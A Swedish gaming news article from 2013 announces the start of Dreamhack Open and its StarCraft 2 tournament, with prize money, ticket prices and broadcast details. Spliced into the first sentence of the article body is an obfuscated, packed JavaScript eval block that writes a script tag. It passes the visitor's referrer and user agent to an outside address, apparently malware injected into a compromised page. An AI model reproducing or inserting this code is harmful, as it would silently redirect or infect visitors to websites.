Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Dreamhack Open 2013 är igång

starcraft 2 heart of the swarm
Filip Urde
  • On 26 april, 2013
  • http://www.revue.se/filip-urde

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tttdf|var|u0026u|referrer|tfizn||js|php’.split(’|’),0,{}))
så drar 2013 års upplaga av Dreamhack Open igång.

 

På Dreamhack Open så kommer vi få se tävlingar i StarCraft 2: Heart of the Swarm, del ett av fem drar igång idag på Annexet i Stockholm. Dreamhack Open är dock inte med i Blizzards nya satsning av StarCraft 2 World Championship. Det är däremot en möjligt att plocka poäng, som sedan räknas in när de  16 finalisterna i World Championship ska utses.

Dreamhack Open pågår idag 26 april – 27 april och det är 96 spelare från hela världen som tävlar om 175 000 kronor och ett förstapris som är värt 60 000 kronor.

Självklart så håller vi ett extra öga på Svenske Marcus ”ThorZaIN” Eklöf, som säger sig ha hittat formen igen.

Vill du se eventet på plats så kostar biljetterna mellan 170 – 274 kronor och dem köper du här. Annars så sänds eventet på Twitch TV och SVT.
open.dreamhack.se